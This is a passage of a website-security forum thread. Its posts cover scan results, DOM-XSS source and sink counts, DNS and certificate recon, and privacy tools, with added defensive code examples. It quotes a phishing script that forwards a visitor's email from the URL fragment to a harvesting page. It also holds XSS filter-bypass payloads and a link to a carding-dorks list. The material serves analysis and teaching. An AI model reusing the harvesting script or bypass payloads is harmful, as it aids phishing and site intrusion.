Results from scanning URL: -http://dorinfo.ru/bitrix/templates/test/js/custom.js
Number of sources found: 1
Number of sinks found: 0

And code from Results from scanning URL: -https://zeus-net.info/
Number of sources found: 7
Number of sinks found: 0
/*! nanoScrollerJS v0.7.2 (c) 2013 James Florentino; Licensed MIT */

Site being built with Citrix- JQuery etc. Scripts not vulnerable.

But Unique IDs about your web browsing habits have been insecurely sent to third parties.

2zdz5jXXXXXXXXXXvrku14zqvh9s2rkm -dorinfo.ruphpsessid  HTTP page.

On host: https://www.shodan.io/host/92.53.106.47

Site could be whitelisted despite the lack of best security policies.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on June 16, 2020, 09:56:50 AM
Website Origin Exposure Test: https://bitmitigate.com/origin-exposure-test.html

Stumbled upon this here: https://urlscan.io/result/44be362b-3303-45df-b26d-9ce187635717/
No origins exposed! Unless 45.88.202.115 is your origin

If your origin servers are exposed attackers can attack them directly and bypass any sort of protection you may have.
Many large CDN companies have bad design which allows for serious security vulnerabilities.

Where we tested for -com-find.info ( https://urlscan.io/result/eb5d63e7-3099-4a96-ac37-9d19113de972/ ),
Bitdefender flags PHISHING -> Amazon-abuse -> https://www.virustotal.com/gui/url/ae8afb6f83c66624ec40e0565177076a8b5950d064fee17e32f5409c729abcbd/detection

Also we have met with a "412 Precondition Failed" see: https://www.shodan.io/host/54.72.9.51
Read: https://www.eukhost.com/kb/412-precondition-failed-error-solved/

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on June 18, 2020, 11:55:06 AM
Did you read this? https://www.reuters.com/article/us-alphabet-google-chrome-exclusive/exclusive-massive-spying-on-users-of-googles-chrome-shows-new-security-weakness-idUSKBN23P0JO
on chrome extension security? Already gone from the Webshop: https://awakesecurity.com/wp-content/uploads/2020/06/GalComm-Malicious-Chrome-Extensions-Appendix-B.txt

How to check before you install or already installed extensions?

Use CRXcavator (yep, rhymes with excavator): https://crxcavator.io/

Enjoy, my good friends, enjoy,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on June 25, 2020, 03:11:48 PM
In website scanning you lose some online scanners and you gain some.

We lost scanners like urlquery dot net, old scan results can sometimes still be found in online archives.
We also lost clean mx as a publicly accessible resource, because of abuse and attacks by cybercriminals.

Sometimes you stumble onto promising new ones, like  https://webbkoll.dataskydd.net/en/results?url=

Use such online website scan resources  in combination with others like:
https://domainwat.ch/site/ & https://censys.io/ & https://www.nlnetlabs.nl/
& https://htbridge.com & https://luxsci.com/smtp-tls-checker
together with a whole row of others.

Enjoy, my good friends, enjoy,

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on June 27, 2020, 06:55:11 PM
What to look for in a URL to catch a PHISH before it catches you!

Nice read-up on that subject: https://towardsdatascience.com/phishing-domain-detection-with-ml-5be9c99293e5
Info credits go to: Ebubekir Büber.

A PHISHING site is not to say all of the site is PHISHING. It could be one page, on a sub-domain or via a hacked website.

Look here: https://www.phishtank.com/phish_detail.php?phish_id=6651347 
or here: https://checkphish.ai/
and combine with a scan here: https://www.zonemaster.net/domain_check   

Also look for top level domain switches where an ending in com is the real McCoy and ending in dot org means a PHISH.
Look for obfuscated code and minified JavaScript (or PHISHING on an account that has been suspended).

Also check here: http://ssl-checker.online-domain-tools.com/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 03, 2020, 04:56:02 PM
Find the dork before the dork may find you.

Weak php and weak cgi exist, and it can be abused by attackers.

See a list like this one: https://gist.github.com/m0k1/ada77aacefe3dcae7bc2
or this one: https://itechhacks.com/latest-fresh-carding-dorks-2016/

Dorks can reveal where such weaknesses exist via a query in a specific search engine, like for instance shodan.io.

It is the task of security to make sure a dork does not lead to an attack: https://cxsecurity.com/dorks/12

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 07, 2020, 12:05:09 AM
Checking on certificates, example: https://crt.sh/?q=avast.com

And in particular one of those: https://crt.sh/?id=49504394

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 10, 2020, 01:25:02 PM
Mozilla now shortens lifespan of TLS certificates also to enhance https security.
A better way to do this is to use DANE for web:
Read: https://cs.gmu.edu/~eoster/doc/2015-08-US-Telecom-DANE.pdf

Check with DANE SMTP Validator (random example): https://dane.sys4.de/smtp/security.nl
or through https://www.huque.com/bin/danecheck  or  https://check.sidnlabs.nl/dane/

polonus
Title: Re: Tests and other Media topics
Post by: polonus on July 12, 2020, 06:11:59 PM
Privacy error on page. Nontrusted Certificate F-grade, see full report here:
https://www.ssllabs.com/ssltest/analyze.html?&hideResults=on&d=myavcs.com
opening up to  -https://www.disasterrecoverycenter.org  also NON TRUSTED and expired!
This website has a T-grade, which is even worse. Advanced iFrame functions there.

You can report similar UNTRUSTED websites through the suspicious site reporter extension in the browser.

Here we can read about exploitable PHP functions and how they have been troubling us for the last thirty years and more:
https://stackoverflow.com/questions/3115559/exploitable-php-functions
and another discussion here on appsec:
https://security.stackexchange.com/questions/1382/disable-insecure-dangerous-php-functions

pol

Title: Re: Tests and other Media topics
Post by: polonus on July 21, 2020, 03:25:01 PM
Testing for PHP on a particular PHISHING page where we know it has Endurance Page Cache PHP translation to HTML; scanning for the Endurance Page Cache HTML may help to reveal it in the code (regular expression mail-code etc.),
example checking on -https://cndherbals.com/endurance-page-cache.html
Quote
<script type="text/javascript">
// accept only strings that look like an e-mail address
function validateEmail(email) {
var re = /^(([^<>()[\]\.,;:\s@\"]+(\.[^<>()[\]\.,;:\s@\"]+)*)|(\".+\"))@((\[[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\])|(([a-zA-Z\-0-9]+\.)+[a-zA-Z]{2,}))$/;
return re.test(email);
}
// the visitor's address arrives in the URL fragment and is forwarded to the harvesting page
var hash = window.location.hash.substring(1);
if(validateEmail(hash)) {
window.location = "-https://www.yuxuans.cn/wp-admin/network/dooo/quota/?email="+hash;
}
</script>
also uses MonsterInsights on Google Analytics,

polonus
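The "Number of sources found / Number of sinks found" figures quoted in the earlier MediaWiki and redirect posts, and the fragment-to-redirect snippet just above, all come down to the same question: where does attacker-influenced data enter a page, and where does it become markup, code or a navigation target. The block below is an added example, not code from the posts or from any named scanner: a line-oriented DOM-XSS source/sink finder with a crude taint heuristic that links a variable filled from a source to a later sink. The two inputs are constructed copies of the patterns quoted in the thread; the URLs are placeholders.

```javascript
// Added example, not code from the forum posts or from any named scanner:
// a line-oriented DOM-XSS source/sink finder with a crude taint heuristic.
// Sample inputs are constructed; URLs are placeholders.

// Reads of attacker-influenced values; the lookahead excludes assignments to them
const SOURCE_PATTERNS = [
  /\blocation\.(hash|search|href|pathname)\b(?!\s*=[^=])/,
  /\bdocument\.(URL|documentURI|referrer|cookie)\b(?!\s*=[^=])/,
  /\bwindow\.name\b(?!\s*=[^=])/,
];

// Places where a string becomes markup, code or a navigation target
// (heuristic: setTimeout/setInterval only matter with a string argument)
const SINK_PATTERNS = [
  /\.(innerHTML|outerHTML)\s*=[^=]/,
  /\bdocument\.write(ln)?\s*\(/,
  /\b(eval|setTimeout|setInterval|Function)\s*\(/,
  /\b(location|location\.href)\s*=[^=]/,
  /\blocation\.(assign|replace)\s*\(/,
  /\.(html|append|prepend|after|before)\s*\(/,
];

// Variable receiving the value on an assignment line
const ASSIGN_TARGET = /\b(?:var|let|const)?\s*([A-Za-z_$][\w$]*)\s*=[^=]/;

function scanDom(code) {
  const sources = [];
  const sinks = [];
  const flows = [];
  const tainted = new Map(); // variable name -> line where it was filled from a source
  code.split(/\r?\n/).forEach((text, index) => {
    const line = index + 1;
    const isSource = SOURCE_PATTERNS.some(p => p.test(text));
    const isSink = SINK_PATTERNS.some(p => p.test(text));
    if (isSource) {
      sources.push({ line, text: text.trim() });
      const m = ASSIGN_TARGET.exec(text);
      if (m) tainted.set(m[1], line);
    }
    if (isSink) {
      sinks.push({ line, text: text.trim() });
      if (isSource) flows.push({ from: line, to: line, via: '(same statement)' });
      for (const [name, from] of tainted) {
        const word = new RegExp('\\b' + name.replace(/\$/g, '\\$') + '\\b');
        if (from < line && word.test(text)) flows.push({ from, to: line, via: name });
      }
    }
  });
  return { sources, sinks, flows };
}

// Report in the style of the counts quoted in the thread
function report(result) {
  const lines = [
    `Number of sources found: ${result.sources.length}`,
    `Number of sinks found: ${result.sinks.length}`,
  ];
  for (const f of result.flows) lines.push(`possible source->sink flow: line ${f.from} -> line ${f.to} via ${f.via}`);
  return lines.join('\n');
}

// Constructed sample 1: the fragment-to-redirect pattern of the phishing page above
const PHISH_REDIRECT_SAMPLE = [
  'function validateEmail(email) { return /^[^\\s@]+@[^\\s@]+\\.[a-z]{2,}$/i.test(email); }',
  'var hash = window.location.hash.substring(1);',
  'if (validateEmail(hash)) {',
  '  window.location = "https://phish.invalid/quota/?email=" + hash;',
  '}',
].join('\n');

// Constructed sample 2: the fixed-URL redirect page quoted earlier; a sink with no source
const PLAIN_REDIRECT_SAMPLE = [
  '<script type="text/javascript">',
  "window.location.href = '/?group_id=1&keyword=2&subid=3&jsChecked=true';",
  '</script>',
].join('\n');

console.log(report(scanDom(PHISH_REDIRECT_SAMPLE)));
console.log(report(scanDom(PLAIN_REDIRECT_SAMPLE)));
```

The counts alone say little (the second sample scores one sink and zero sources and is merely a redirect); the flow line is what separates the first sample, where the fragment reaches the navigation sink, from noise.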
Title: Re: Tests and other Media topics
Post by: polonus on July 22, 2020, 01:12:03 PM
Domain names and subdomain enumeration... DNS and WHOIS protocol methods are used.
Re: https://dnsspy.io/scan
Also for sub-domains: https://securitytrails.com/blog/subdomain-scanner-find-subdomains.

Automatically generated at places where you could register.
Via zone-owner, authorities here are very restrictive because of risks.
Through DNS queries (example Cisco Umbrella (OpenDNS)
Via Certificate Transparency:  https://crt.sh/.
Through scans at shodan & censys etc.
Through multi-threaded scripts, Clone DNS-root-directories to see what is still available (free).
But these are rate-limited against obvious abuse.

Google is your best friend: Googling for site:example.com delivers info on subsites; just try for instance site:wordpress.com or site:moonfruit.com. The latter has many a phishing site (e.g. with site:moonfruit.com owa).
Such queries could be combined with Google dorks e.g. for specific Wordpress versions and/or used themes/ plugins.
Info credits go to: Erik van Straten.

Look at resources like: RobTex.com

https://pentest-tools.com/information-gathering/find-subdomains-of-domain#

Also try:  https://www.ultratools.com/

There are many (semi-)public DNS servers that gather data on DNS lookups.
Such data is being used to look up sub-domains and hostnames per IP.
Resources can be public or on demand.
Whenever you use a "secret" hostname, one should check what DNS servers will get your requests.
Do not use public name servers and/or on clients.

Then we have AXFR unrestricted, open to offenders, to get to all of the zone.
This should be limited to trusted name servers. Check all name servers of that particular domain.
Has a zone file been entered online?

dig ANY. The DNS server for that domain has all known domains from cache.

An open root directory on a web server can also lead to disclosure.

Also a DNS server or interface of control panel (etc.) could be hacked.

Also look for test-servers. Often these are not being maintained.

The plugin update check for WordPress is spurious; it cannot be fully trusted.
When using backup plugins, check that they are not available online.
Remove disabled plugins and all remaining files. (info credits anonymous resources)

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
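Of the enumeration routes listed above, Certificate Transparency is the one that yields structured data rather than search results. The block below is an added example, not code from the post: it collapses a crt.sh result set into a unique list of hostnames under one apex, discards SAN entries and lookalikes that merely contain the apex, separates wildcard entries, and flags first labels that usually mark the test servers the post says are often unmaintained. Assumption: crt.sh's ?output=json returns objects whose name_value holds one or more newline-separated names; the records below are constructed and example.com is a placeholder apex.

```javascript
// Added example, not code from the forum post: collapsing a crt.sh result set
// into a unique list of hostnames under one apex. Assumption: crt.sh's
// ?output=json returns objects whose name_value holds one or more
// newline-separated names; the records below are constructed.

const SAMPLE_CRT_RECORDS = [
  { not_before: '2020-05-01T00:00:00', name_value: 'www.example.com\nexample.com' },
  { not_before: '2020-04-01T00:00:00', name_value: '*.example.com' },
  { not_before: '2019-11-01T00:00:00', name_value: 'dev.example.com' },
  { not_before: '2020-05-01T00:00:00', name_value: 'WWW.EXAMPLE.COM.' },              // case and trailing dot differ
  { not_before: '2020-01-01T00:00:00', name_value: 'example.com.evil.test\nevilexample.com' }, // lookalikes, not ours
  { not_before: '2020-03-01T00:00:00', name_value: 'mail.example.com\nautodiscover.example.com' },
];

// Hostnames that belong to the apex: the apex itself or anything ending in ".apex";
// "evilexample.com" and "example.com.evil.test" must not pass.
function belongsTo(name, apex) {
  return name === apex || name.endsWith('.' + apex);
}

function hostnamesFromCrt(records, apex) {
  apex = apex.toLowerCase();
  const hosts = new Set();
  const wildcards = new Set();
  for (const rec of records) {
    for (const raw of String(rec.name_value || '').split('\n')) {
      const name = raw.trim().toLowerCase().replace(/\.$/, ''); // normalise case and trailing dot
      if (!name || !belongsTo(name, apex)) continue;
      (name.startsWith('*.') ? wildcards : hosts).add(name);
    }
  }
  return { hosts: [...hosts].sort(), wildcards: [...wildcards].sort() };
}

// First labels that usually mark non-production systems, which the post above
// singles out as often unmaintained
const RISKY_LABELS = /^(dev|test|staging|stage|uat|qa|old|backup|bak|beta|demo)\d*$/;

function flagRisky(hosts) {
  return hosts.filter(h => RISKY_LABELS.test(h.split('.')[0]));
}

const result = hostnamesFromCrt(SAMPLE_CRT_RECORDS, 'example.com');
console.log(result.hosts);            // [ 'autodiscover.example.com', 'dev.example.com', 'example.com', 'mail.example.com', 'www.example.com' ]
console.log(result.wildcards);        // [ '*.example.com' ]
console.log(flagRisky(result.hosts)); // [ 'dev.example.com' ]
```

A wildcard certificate is listed separately because it says nothing about which hosts exist; it only tells you that any label under the apex could be served with a valid certificate, which is exactly why the post's other routes (DNS queries, search engines) are still needed.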


Title: Re: Tests and other Media topics
Post by: polonus on July 24, 2020, 12:35:53 PM
What to do when we have a domain like: -http://ww12.d-analyse.com/  for instance?
This is a parking logic - parking crew monetizing website.

Hosted @, see:https://www.shodan.io/host/54.72.9.115
on -ec2-54-72-9-115.eu-west-1.compute.amazonaws.com

Is this website a legit website? This because the domain format is not a valid one, e.g. ww12.etc.
Can we say this is a form of cert. abuse?

Parking-monetizers (in the cloud) can so avoid detection.

Somewhat higher up in that hosting domain we find:
https://dnsspy.io/scan/eu-west-1.compute.amazonaws.com  (info credits go to: luntrus)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 07, 2020, 09:37:44 PM
XSS Filters: a cure against DOM-XSS exploits.
Example code
Quote
*/
require("mocha");
expect = require('expect.js');
xssFilters = require('../src/xss-filters');
testutils = require('./utils.js');
require('./unit/private-xss-filters.js');
require('./unit/xss-filters.js');
Source: Yahoo archives.
- See owasp.org XSS Filter Evasion Sheet.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 08, 2020, 09:20:17 PM
But nothing comes guaranteed in webcode development and with script security,
so one can even evade such XSS Filters:
https://owasp.org/www-community/xss-filter-evasion-cheatsheet

Already convinced this will be an ongoing battle i.m.h.o.

For instance abuse scans worked with issues from an XSS Filter Bypass list,
for instance add: <script/src=data:,alert()> or e.g. %3Cscript/src=data:,alert(retire.js)%3E
(only for legit pentesters that were granted exclusive written permission from the owner).

polonus (volunteer 3rd party cold reconnaissance website security analyst and website error-hunter)
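Added example (not from the posts, nor from Yahoo's xss-filters): a blacklist-style filter of the kind the evasion sheet defeats, beside context-aware output encoding, exercised with the two payloads quoted above. Function names and patterns are my own.

```javascript
// Added example (not from the posts or from Yahoo's xss-filters):
// a blacklist filter versus context-aware output encoding, exercised
// with the payloads quoted in the post. Names and patterns are my own.

// A naive blacklist: removes "<script" only when followed by whitespace or ">".
// The "<script/src=...>" form from the evasion sheet slips past it.
function naiveScriptFilter(input) {
  return String(input).replace(/<script[\s>]/gi, "");
}

// Context-aware encoding for HTML text and double-quoted attribute values:
// nothing the browser's tokenizer could read as markup survives.
const HTML_ESCAPES = {
  "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;", "/": "&#x2F;",
};
function encodeForHtml(input) {
  return String(input).replace(/[&<>"'\/]/g, (c) => HTML_ESCAPES[c]);
}

// URL sink filter (src=, href=): keep http(s) and scheme-less URLs,
// reject data:, javascript: and any other scheme. Callers should strip
// control characters first, which browsers ignore inside a scheme.
function safeUrl(input) {
  const u = String(input).trim();
  const hasScheme = /^[a-z][a-z0-9+.-]*:/i.test(u);
  return !hasScheme || /^https?:/i.test(u) ? u : "about:blank";
}

// The HTML tokenizer starts a script tag at "<script" followed by
// whitespace, "/" or ">"; use that rule, not the naive one, to judge output.
function containsScriptTag(html) {
  return /<script[\s\/>]/i.test(html);
}

// Payloads: the plain form the filter was written for, plus the two
// quoted in the post (the second one URL-decoded first).
const PAYLOADS = [
  "<script>alert()</script>",
  "<script/src=data:,alert()>",
  decodeURIComponent("%3Cscript/src=data:,alert(retire.js)%3E"),
];

// For one payload: does each defence leave the output free of a script tag?
function evaluate(payload) {
  return {
    naiveFilterHolds: !containsScriptTag(naiveScriptFilter(payload)),
    encodingHolds: !containsScriptTag(encodeForHtml(payload)),
  };
}

// One row per payload; the blacklist holds only for the first one.
function summary() {
  return PAYLOADS.map((p) => ({ payload: p, ...evaluate(p) }));
}
```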
Title: Re: Tests and other Media topics
Post by: polonus on August 09, 2020, 11:10:11 AM
L.S.

No more SQL injections with WASPlang?

* Sql injections are to be avoided using prepared statements with parameters
Sanitizing is felt to be for dummies.
However, considering the following  (for what it is worth ;)).

Little footprint, assembly line makes it harder for XSS attacks and SQL injection to succeed,
but only when code neatly sanitized *

Features

encourages immutability
immutable c-strings, memory manipulation, global variables, imported functions, 1st class functions
optional standard library runtime
functions with inline web assembly
test framework support
easy project dependency management
self hosting

Source: https://github.com/wasplang/wasp

Simplified parser code for configuring WSON (like JSON but for WASPlang),
see: https://github.com/wasp-lang/wasp/issues/18

Also read: https://github.com/renjithgr/starred-repos & for sanitizing:
https://drupal.stackexchange.com/questions/1967/what-does-sanitized-mean-in-api-documentation

And to make this circle discussion go round again:
https://api.drupal.org/api/drupal/includes%21common.inc/function/filter_xss/7.x (see warnings there).

Info credits dehondgaatlatijddeaud & #sockpuppet & luntrus

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
Title: Re: Tests and other Media topics
Post by: polonus on August 10, 2020, 10:28:15 AM
DOM-XSS exploits are just part of the story.
Pentesters and researchers work preferably from combined sec lists like:
https://github.com/danielmiessler/SecLists

So for instance analyse XSS-DOM sinks and sources -> https://cheatsheetseries.owasp.org/cheatsheets/DOM_based_XSS_Prevention_Cheat_Sheet.html
with weaknesses (medium and low vulnerabilities) through retirable jQuery libraries:

Many developers use  Retire.JS (developed by Erlend Oftedal), also found online as:
https://retire.insecurity.today/  (Retire.JS can also be used as extension inside the browser).

Know that some libraries have reached EOL for quite some time, read:
https://github.com/jquery/jquery.com/issues/162#issuecomment-298656430

Only vulnerable in the case that certain functions are being called, so better to upgrade that particular library.

In that code there may be a weakness like s.iframe Src+,
but it could be src already before that has been validated properly.
(my info sources; luntrus & not me)

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 10, 2020, 12:05:46 PM
Why does the above information urge us to scan for such exploitable website code?

Let's go over vulnerable jQuery code from a site that is launching heodo malware and emotet malcode:
https://urlhaus.abuse.ch/url/428165/

WordPress scan shows 5 security issues in the WordPress CMS.
Outdated plug-ins like header-footer-elementor 1.4.1 and elementor 2.9.7
User enumeration not set to disabled. Directory listing /wp-content/uploads/   is left as:  enabled

Detected as vulnerable jQuery library to be retired, see: https://retire.insecurity.today/#!/scan/ac83b63cdec87cf9d917d6cb12995a5df8c57a639e8063305f2e5f6f76c546f8

Results from scanning URL: -https://earnquick.co.uk/wp-includes/js/jquery/jquery.js?ver=1.12.4-wp
Number of sources found: 41
Number of sinks found: 17

Sources: .top  .innerHTML  [name=  location.  .top,  .opener  .name=  .name&  .name,  .parent(  .open( 
Sinks: value=  href= data (g.data)  .data  data=  .write(  value  src= 

Site not flagged by DShield    CLEAN
AlienVault OTX      CLEAN
Cisco Talos    CLEAN
abuse.ch (Feodo)    CLEAN
URLhaus    CLEAN
Spamhaus (Drop / eDrop)    CLEAN

polonus (volunteer 3rd party cold recon website security-analyst and website error-hunter)
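Added example, not the scan service whose output is pasted above, serving this post and the DOM sinks/sources post before it: a textual DOM-XSS source/sink counter that reports in the same "Number of sources found / sinks found" shape. The pattern lists follow the OWASP DOM XSS cheat sheet and the sample script is constructed; a textual hit is a candidate for review, not a confirmed flaw.

```javascript
// Added example (not the scanner used in the posts): a textual DOM-XSS
// source/sink counter. Pattern lists follow the OWASP DOM XSS cheat sheet;
// the sample script below is constructed.

// Where attacker-controlled data enters the page.
const SOURCE_PATTERNS = [
  /\blocation\./g, /\bdocument\.URL\b/g, /\bdocument\.referrer\b/g,
  /\bwindow\.name\b/g, /\.opener\b/g, /\bdocument\.cookie\b/g,
  /\baddEventListener\(\s*["']message["']/g,
];
// Where such data becomes code or markup (assignments only, not comparisons).
const SINK_PATTERNS = [
  /\.innerHTML\s*=(?!=)/g, /\.outerHTML\s*=(?!=)/g, /\bdocument\.write(ln)?\(/g,
  /\beval\(/g, /\bnew Function\(/g, /\bset(Timeout|Interval)\(\s*["'`]/g,
  /\.(src|href|action)\s*=(?!=)/g, /\.insertAdjacentHTML\(/g,
];

// Count hits per pattern; keys are the pattern sources for readability.
function countMatches(text, patterns) {
  const hits = {};
  for (const re of patterns) {
    const m = text.match(re);
    if (m) hits[re.source] = m.length;
  }
  return hits;
}

function scanScript(text) {
  const sources = countMatches(text, SOURCE_PATTERNS);
  const sinks = countMatches(text, SINK_PATTERNS);
  const total = (o) => Object.values(o).reduce((a, b) => a + b, 0);
  return { sources, sinks, sourceCount: total(sources), sinkCount: total(sinks) };
}

// Line numbers of every hit: the part a manual review actually needs.
// A fresh RegExp per line avoids the lastIndex state of the global patterns.
function locate(text, patterns) {
  const out = [];
  text.split("\n").forEach((line, i) => {
    for (const re of patterns) {
      if (new RegExp(re.source).test(line)) out.push({ line: i + 1, pattern: re.source });
    }
  });
  return out;
}

// Same three-line shape as the scan output pasted in the posts.
function report(url, text) {
  const r = scanScript(text);
  return `Results from scanning URL: ${url}\n` +
    `Number of sources found: ${r.sourceCount}\n` +
    `Number of sinks found: ${r.sinkCount}`;
}

// Constructed sample: a hash fragment flows into innerHTML, window.name into
// an iframe src, and the referrer into document.write.
const SAMPLE_SCRIPT = `
var q = location.hash.slice(1);
document.getElementById("out").innerHTML = q;
var frame = document.createElement("iframe");
frame.src = window.name;
document.write("<p>" + document.referrer + "</p>");
`;
```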
Title: Re: Tests and other Media topics
Post by: polonus on August 11, 2020, 07:23:29 PM
Check a website domain for hsts-preload inclusion: hstspreload.org

Site should be set to be in a certain ruleset already available in the browser.
Re: https://trac.torproject.org/projects/tor/ticket/10424
Read -> http://www.thoughtcrime.org/software/sslstrip/

Why could this be important on Tor to avoid certain recent MITM attacks?
Re: https://scotthelme.co.uk/hsts-preload-test/

Read: https://medium.com/@nusenu/how-malicious-tor-relays-are-exploiting-users-in-2020-part-i-1097575c0cac

Tor will protect your identity not your data going over the exit node.

This hacker still seems to have owned 10% of existing exit nodes, hence mainly interested in bitcoin exit nodes.

We can assume his activities will not be taken lightly by fellow cybercrime colleagues.  :D

See that HTTPS Everywhere, even as it comes built-in with Tor, won't always protect the end-user against downgrading attacks.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 11, 2020, 10:17:41 PM
The first person who spoke about such an SSL downgrading attack, SSL stripping,
was a researcher by the name of Moxie Marlinspike.

There are three ways to perform such SSL stripping attack:
1. Using a Proxy Server;
2. Via ARP Spoofing;
3. Using  an insecure Hotspot

Also a 4th I found out: using a particular scan service (info credits: luntrus).
Example XSS-DOM scan: Results from scanning URL: -http://ad.nl
Number of sources found: 2
Number of sinks found: 421 (same results as with -https://ad.nl (random example)

Ways to protect against this is to enable HTTPS on pages of your website,
implement HSTS policy, as we discussed above, the browser won't open a site
unless the site uses HTTPS.  (info credits Comodo's SSL).

Mind that Mainland China now blocks https-traffic using TLS 1.3 & ESNI (known as encrypted server name indication),
read: https://geneva.cs.umd.edu/posts/china-censors-esni/esni/  &   https://gfw.report/blog/gfw_esni_blocking/en/

To test this - To perform this test, go and visit here: https://www.cloudflare.com/ssl/encrypted-sni/
and then click the orange button for “Check My Browser”. Just a moment later you  will see the results.

Chrome does not support ESNI yet at this moment. We can foresee it being rolled out like DoH.
As some schools would not like seeing their filtering software not functioning properly because of this.
So there are still some hooks, but different from interfering with Big Firewall surveillance measurements,
 as mentioned above.  ;)

Enjoy, my good friends, enjoy.

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 13, 2020, 10:07:22 PM
And again the community lost a fine website scan site.
This was hacked: -http://www.redleg-redleg.com/ 

The site at https://aw-snap.info/ is no longer available.
Also https://aw-snap.info/file-viewer/ gone.
Thank you redleg for all the scan results. We will miss you,

polonus
Title: Re: Tests and other Media topics
Post by: polonus on August 26, 2020, 04:25:44 PM
How to block first party pixel tracking -> Privacy Badger is one of the many tools capable of doing this.
Read: https://www.eff.org/deeplinks/2019/07/sharpening-our-claws-teaching-privacy-badger-fight-more-third-party-trackers
Also https://ublockorigin.com/ is an adblocker capable of doing so.

Let us see what Facebook does to circumvent this.
Whenever an end-user opens a Facebook ad a unique string becomes added to the landing page URL.
In there we will find hidden first party tracking pixels to circumvent third party tracking blocking.
This is downloaded like it would be a first party cookie, and can then still land at Facebook's desks.
This is now the only default Facebook will offer the user.

One now would use rules to block, like
Code:
||facebook.com^
and so on for all of Facebook's domains and subdomains.

To block one could also use specific browser extensions like Neat URL and Facebook Container.
On Windows I use cookienator as a tool.

Also this Google and firefox extension -> https://github.com/jparise/chrome-utm-stripper
But a two-sided sword, when you like to unsubscribe for instance:
https://github.com/jparise/chrome-utm-stripper/pull/24


polonus
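Added example (not Neat URL, chrome-utm-stripper or any other tool named above): strip the click identifiers that ride along on ad landing-page URLs, with an exemption list for the concern raised in that pull request that some links, such as unsubscribe pages, need their parameters intact. The parameter names and the exemption entries are my own assumptions.

```javascript
// Added example (not one of the extensions named in the post): strip tracking
// parameters from landing-page URLs, with an exemption list for links that
// must keep them. Parameter list and exemption entries are assumptions.

// Click/campaign identifiers to drop (assumed list; extend from your own logs).
const TRACKING_PARAM = /^(utm_\w+|fbclid|gclid|dclid|msclkid|igshid|mc_eid|mc_cid)$/i;

// Constructed exemption: links under this host and path keep every parameter,
// the unsubscribe case from the pull request discussion.
const KEEP_RULES = [{ host: "list.example.org", pathPrefix: "/unsubscribe" }];

function isExempt(u) {
  return KEEP_RULES.some(
    (r) => u.hostname === r.host && u.pathname.startsWith(r.pathPrefix));
}

// Returns the cleaned URL and the parameter names removed, so a log can show
// what was stripped. Input that is not an absolute URL is returned untouched.
function stripTracking(urlString) {
  let u;
  try {
    u = new URL(urlString);
  } catch (e) {
    return { url: urlString, removed: [] };
  }
  if (isExempt(u)) return { url: u.toString(), removed: [] };
  // Set: a repeated parameter name is deleted once and reported once.
  const removed = [...new Set(
    [...u.searchParams.keys()].filter((k) => TRACKING_PARAM.test(k)))];
  for (const name of removed) u.searchParams.delete(name);
  return { url: u.toString(), removed };
}
```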

Title: Re: Tests and other Media topics
Post by: polonus on August 26, 2020, 06:03:30 PM
Checked on cookies for a click-bait website (a conspiracy resource content website):
https://webcookies.org/cookies/niburu.co/347973

Compare with cookieserve scan results:
Cookie   Description   Duration   Type
__cfduid   The cookie is set by CloudFare. The cookie is used to identify individual clients behind a shared IP address and apply security settings on a per-client basis. It does not correspond to any user ID in the web application and does not store any personally identifiable information.   4 weeks   Necessary
60554656f3b887df8b325edf687fb71c      50 years ago   undefined

Also re: https://urlscan.io/result/fde1ce16-e8c0-4e60-8d61-14ee9919bac5/

DOM-XSS scan results -> Results from scanning URL: -https://niburu.co/
Number of sources found: 1
Number of sinks found: 221
&
Results from scanning URL: -https://niburu.co/modules/mod_sp_poll/assets/js/script.js
Number of sources found: 3
Number of sinks found: 4
&
Results from scanning URL: -https://niburu.co/media/jui/js/jquery-migrate.min.js?cf580d0734d987ba044c67a0cf573cc5
Number of sources found: 62
Number of sinks found: 31
&
Results from scanning URL: -https://niburu.co/modules/mod_gjc_slider/assets/js/jquery.gjc_slider-min.js
Number of sources found: 0
Number of sinks found: 0  no conflict..

2 vulnerable jQuery libraries detected: https://retire.insecurity.today/#!/scan/d35a703f86d9f686d5118a1f878f9a74b322af98ad0abc763d56f661d48acee8

Improvement hints: https://webhint.io/scanner/13fda575-cb6d-42ab-a91c-3c0836e170d8

Outdated Joomla CMS: https://sitecheck.sucuri.net/results/niburu.co

Externally linked sites Google Safebrowsing approved.

For: -https/static.addtoany.com/menu/page.js
We have Hardening Improvements

Security Headers
Missing security header for ClickJacking Protection.
Alternatively, you can use Content-Security-Policy: frame-ancestors 'none'.
Affected pages:
-https://static.addtoany.com/404javascript.js
-https://static.addtoany.com/404testpage4525d2fdc

Missing Content-Security-Policy directive.
 We recommend to add the following CSP directives
(you can use default-src if all values are the same): script-src, object-src, base-uri, frame-src.
Affected pages:
-https://static.addtoany.com/404javascript.js
-https://static.addtoany.com/404testpage4525d2fdc

polonus (volunteer 3rd party cold recon website security analyst and website error-hunter)
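Added example, not a tool from this thread, for the scan findings quoted above (clickjacking protection, CSP directives) and for the HSTS preload posts of August 11: evaluate one response's headers for preload eligibility, clickjacking protection and the CSP directives the scan asks for. The header sets are constructed; the preload thresholds are the ones hstspreload.org publishes.

```javascript
// Added example (not a tool from the thread): check a response's headers for
// HSTS preload eligibility, clickjacking protection and the CSP directives
// recommended in the scan findings above. Header sets are constructed.

function parseHsts(value) {
  const out = { maxAge: null, includeSubDomains: false, preload: false };
  for (const raw of value.split(";")) {
    const [k, v] = raw.trim().split("=").map((s) => (s || "").trim());
    const key = k.toLowerCase();
    if (key === "max-age") out.maxAge = Number(v);
    else if (key === "includesubdomains") out.includeSubDomains = true;
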